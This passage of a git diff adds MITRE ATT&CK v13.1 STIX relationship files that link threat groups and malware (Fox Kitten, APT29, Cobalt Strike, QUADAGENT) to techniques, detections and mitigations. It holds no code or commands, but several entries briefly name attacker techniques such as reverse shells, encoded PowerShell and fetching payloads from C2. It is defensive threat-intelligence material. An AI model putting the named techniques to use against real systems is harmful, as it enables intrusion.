{ + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607", + "type": "relationship", + "created": "2020-10-19T16:48:08.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "modified": "2020-10-21T01:45:59.183Z", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43.json new file mode 100644 index 0000000000000000000000000000000000000000..d6d43d3f7ae39396859ba2410dda9f853d67f225 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--e35ebd61-84d4-4260-89d3-9cf7a919155f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43", + "created": "2022-03-30T14:26:51.836Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", + "modified": "2022-04-19T23:58:54.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96", + "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8.json new file mode 100644 index 0000000000000000000000000000000000000000..72d974940f88d5df09f3ac985d50658ea7b8008f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--a9ce9f6d-fb52-41a5-826d-ef9fac25c47e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8", + "type": "relationship", + "created": "2020-12-29T20:23:05.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ClearSky Pay2Kitten December 2020", + "url": "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf", + "description": "ClearSky. (2020, December 17). Pay2Key Ransomware \u2013 A New Campaign by Fox Kitten. Retrieved December 21, 2020." + } + ], + "modified": "2021-04-12T19:34:40.099Z", + "description": "[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Perl reverse shell to communicate with C2.(Citation: ClearSky Pay2Kitten December 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fd8c87-da99-42b3-a792-0d224732c84a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fd8c87-da99-42b3-a792-0d224732c84a.json new file mode 100644 index 0000000000000000000000000000000000000000..accc3e8a69fe93879d4c499f696de7a0126d3a51 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fd8c87-da99-42b3-a792-0d224732c84a.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--42616edc-0c9a-44b6-9e60-053f60ff911f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00fd8c87-da99-42b3-a792-0d224732c84a", + "type": "relationship", + "created": "2022-02-02T15:55:21.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky WIRTE November 2021", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022." + } + ], + "modified": "2022-02-02T15:55:21.760Z", + "description": "(Citation: Kaspersky WIRTE November 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "target_ref": "malware--9020f5c7-efde-4125-a4f1-1b70f1274ddd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa.json new file mode 100644 index 0000000000000000000000000000000000000000..7582e74d7857e0e88b6e2ee373b8cb8a8a72afe7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--10b44f10-9d66-4e6a-90f0-2b9b6ab07279", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa", + "created": "2023-03-26T21:11:13.777Z", + "revoked": false, + "external_references": [ + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-26T21:11:13.777Z", + "description": "During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used a compromised O365 administrator account to create a new Service Principal.(Citation: CrowdStrike StellarParticle January 2022)", + "relationship_type": "uses", + "source_ref": "campaign--808d6b30-df4e-4341-8248-724da4bac650", + "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9.json new file mode 100644 index 0000000000000000000000000000000000000000..bbe9b938d9147cd845abc142e28021e3e207cb0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--04202c95-0f95-471e-88f3-9cba23febd42", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9", + "type": "relationship", + "created": "2019-06-28T17:40:32.413Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cyphort EvilBunny Dec 2014", + "url": "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "description": "Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019." + } + ], + "modified": "2019-07-01T18:16:33.116Z", + "description": "[EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014)", + "relationship_type": "uses", + "source_ref": "malware--a8a778f5-0035-4870-bb25-53dc05029586", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e.json new file mode 100644 index 0000000000000000000000000000000000000000..70cfb76a1b67a638210b188a0a2618df4e796ad2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9992ddbe-f3f5-46b9-a489-b180d776f6dd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e", + "created": "2022-04-10T18:32:35.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CrowdStrike AQUATIC PANDA December 2021", + "description": "Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.", + "url": "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T21:16:58.413Z", + "description": "[Aquatic Panda](https://attack.mitre.org/groups/G0143) has encoded PowerShell commands in Base64.(Citation: CrowdStrike AQUATIC PANDA December 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11", + "target_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0110e04e-5812-4b69-9700-037b52d3ebb4.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0110e04e-5812-4b69-9700-037b52d3ebb4.json new file mode 100644 index 0000000000000000000000000000000000000000..29e18137e638fbb453a4d781176e134e0dc1fc8b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0110e04e-5812-4b69-9700-037b52d3ebb4.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--828feda8-7fcb-47a5-825f-94de6de2250e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0110e04e-5812-4b69-9700-037b52d3ebb4", + "created": "2022-04-11T17:47:16.063Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Trend Micro Iron Tiger April 2021", + "url": "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pandora](https://attack.mitre.org/software/S0664) can load additional drivers and files onto a victim machine.(Citation: Trend Micro Iron Tiger April 2021)", + "modified": "2022-04-11T17:47:16.063Z", + "relationship_type": "uses", + "source_ref": "malware--a545456a-f9a7-47ad-9ea6-8b017def38d1", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01202a82-56cc-4770-abf1-1a37c8717dba.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01202a82-56cc-4770-abf1-1a37c8717dba.json new file mode 100644 index 0000000000000000000000000000000000000000..efc4a9a474fedf0803f3aa5bb33ce35ef7d2641b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01202a82-56cc-4770-abf1-1a37c8717dba.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--21970b49-6144-4cdc-9161-2049df04e019", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01202a82-56cc-4770-abf1-1a37c8717dba", + "type": "relationship", + "created": "2020-12-07T20:11:44.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Crutch December 2020", + "url": "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/", + "description": "Faou, M. (2020, December 2). Turla Crutch: Keeping the \u201cback door\u201d open. Retrieved December 4, 2020." + } + ], + "modified": "2020-12-07T20:11:44.020Z", + "description": "[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)", + "relationship_type": "uses", + "source_ref": "malware--925a6c52-5cf0-4fec-99de-b0d6917d8593", + "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3.json new file mode 100644 index 0000000000000000000000000000000000000000..fbaa4c6ce7de7c9dec06a771a850f476f106311c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1c95cab4-086d-43e3-948f-11fc633515cc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3", + "created": "2022-10-13T16:09:34.638Z", + "revoked": false, + "external_references": [ + { + "source_name": "NCC Group TA505", + "description": "Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.", + "url": "https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:09:34.638Z", + "description": "(Citation: NCC Group TA505)", + "relationship_type": "uses", + "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d", + "target_ref": "tool--f59508a6-3615-47c3-b493-6676e1a39a87", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5.json new file mode 100644 index 0000000000000000000000000000000000000000..f69ff2ce15b9e6dfb5afe48a0c3f8d6bf8123e17 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--aa049d4f-2f4b-4b2f-a5d2-af9ca23af24f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5", + "type": "relationship", + "created": "2021-12-01T18:49:06.980Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Gelsemium June 2021", + "url": "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf", + "description": "Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021." + } + ], + "modified": "2021-12-01T18:49:06.980Z", + "description": "[Chrommme](https://attack.mitre.org/software/S0667) can enumerate the IP address of a compromised host.(Citation: ESET Gelsemium June 2021)", + "relationship_type": "uses", + "source_ref": "malware--579607c2-d046-40df-99ab-beb479c37a2a", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f.json new file mode 100644 index 0000000000000000000000000000000000000000..1e2e839c7c730c11c5b992c059b82c92f74b656f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f.json @@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e947b564-125c-4b3f-88b8-70cd9552fd8b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f", + "type": "relationship", + "created": "2022-03-30T14:26:51.860Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.860Z", + "description": " Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. (ex: Windows EID 4625 or 5379)", + "source_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "target_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01292102-1f89-4358-b62c-bc0afd49fc52.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01292102-1f89-4358-b62c-bc0afd49fc52.json new file mode 100644 index 0000000000000000000000000000000000000000..df16e734cb8eae83ef5765e33b83876f11d25ac8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01292102-1f89-4358-b62c-bc0afd49fc52.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--50c2e78f-216d-43d8-a3c8-3d3938699431", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01292102-1f89-4358-b62c-bc0afd49fc52", + "type": "relationship", + "created": "2020-03-17T02:18:35.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "source_name": "Unit 42 QUADAGENT July 2018" + } + ], + "modified": "2020-03-17T02:18:35.198Z", + "description": "[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)", + "relationship_type": "uses", + "source_ref": "malware--7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f.json new file mode 100644 index 0000000000000000000000000000000000000000..21df9c7c750f2fdd78ee1c855b7bbfde1fd0119f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--e582f400-941f-4e90-867a-3191606feb67", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f", + "created": "2022-03-30T14:26:51.867Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Sygnia Golden SAML", + "url": "https://www.sygnia.co/golden-saml-advisory", + "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Monitor for the use of access tokens to access services such as email that were created using SAML tokens which do not have corresponding 1202 events (i.e. \u201cThe Federation Service validated a new credential\u201d) in the domain.(Citation: Sygnia Golden SAML)", + "modified": "2022-04-14T16:49:49.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428", + "target_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2.json new file mode 100644 index 0000000000000000000000000000000000000000..d394a9f1640df84b5bb17540ba1edef7baffb9b8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4448d365-a6c2-47d0-8c36-fb2d0de1220b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2", + "created": "2021-05-28T14:56:24.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft PowerShell CLM", + "description": "PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.", + "url": "https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:01:11.404Z", + "description": "Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., `Add-Type`).(Citation: Microsoft PowerShell CLM)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1.json new file mode 100644 index 0000000000000000000000000000000000000000..d949a6ea90d30b208ac332b7b83d799715a751a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1.json @@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--468cc8d0-c3c8-4cb3-8185-77af41fb2fea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1", + "created": "2021-04-07T14:10:22.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Cobalt Strike September 2020", + "description": "Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.", + "url": "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf" + }, + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-11-30T22:37:12.396Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123.json new file mode 100644 index 0000000000000000000000000000000000000000..6853d4597cb94897b057c9f2da59a7bffb8fc37b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123.json @@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--441d3038-5fb3-4be8-bcfc-6b41ea01193f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123", + "type": "relationship", + "created": "2020-01-24T19:36:42.015Z", + "created_by_ref": 